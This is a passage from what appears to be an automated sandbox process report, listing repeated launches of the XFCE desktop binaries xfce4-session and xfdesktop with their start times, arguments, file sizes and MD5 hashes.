                                                        File size:473520 bytes
                                                        MD5 hash:dfb13e1581f80065dcea16f2476f16f2

                                                        Start time (UTC):06:59:07
                                                        Start date (UTC):28/05/2024
                                                        Path:/usr/bin/xfce4-session
                                                        Arguments:-
                                                        File size:264752 bytes
                                                        MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                        Start time (UTC):06:59:07
                                                        Start date (UTC):28/05/2024
                                                        Path:/usr/bin/xfdesktop
                                                        Arguments:xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
                                                        File size:473520 bytes
                                                        MD5 hash:dfb13e1581f80065dcea16f2476f16f2

                                                        Start time (UTC):06:59:11
                                                        Start date (UTC):28/05/2024
                                                        Path:/usr/bin/xfce4-session
                                                        Arguments:-
                                                        File size:264752 bytes
                                                        MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                        Start time (UTC):06:59:11
                                                        Start date (UTC):28/05/2024
                                                        Path:/usr/bin/xfdesktop
                                                        Arguments:xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
                                                        File size:473520 bytes
                                                        MD5 hash:dfb13e1581f80065dcea16f2476f16f2

                                                        Start time (UTC):06:59:15
                                                        Start date (UTC):28/05/2024
                                                        Path:/usr/bin/xfce4-session
                                                        Arguments:-
                                                        File size:264752 bytes
                                                        MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                        Start time (UTC):06:59:15
                                                        Start date (UTC):28/05/2024
                                                        Path:/usr/bin/xfdesktop
                                                        Arguments:xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
                                                        File size:473520 bytes
                                                        MD5 hash:dfb13e1581f80065dcea16f2476f16f2